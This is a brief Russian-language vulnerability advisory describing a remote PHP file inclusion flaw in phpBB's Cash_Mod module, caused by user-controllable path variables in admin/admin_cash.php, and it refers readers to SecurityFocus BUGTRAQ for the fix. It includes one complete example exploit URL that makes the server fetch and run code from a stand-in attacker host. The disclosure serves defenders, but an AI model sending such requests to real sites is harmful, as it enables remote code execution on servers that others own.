Обнаружена серьезная уязвимость в модуле Cash_Mod(всех версий) форума phpBB. Уязвимость заключается в возможности злоумышленнику выполнить произвольный PHP код. Такую возможность дает неправильное описание переменных "$phpbb_root_path" и "$phpEx" в файле "admin/admin_cash.php", значения которых может изменить любой пользователь выполнив GET или POST запрос. В итоге злоумышленник может использовать любой PHP код, полученный с удаленного сайта, указав необходимый путь при помощи упомянутых ранее параметров. Например, выполнение произвольного кода находящегося в файле "/includes/functions_cash./test.php" на веб-сервере "http://crackersite/" будет выглядеть так:
"http:/host/phpbb2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://crackersite/&phpEx=/test.php".
По приведенной ниже ссылке, вы сможете узнать о способе ликвидации этой уязвимости.
SecurityFocus BUGTRAQ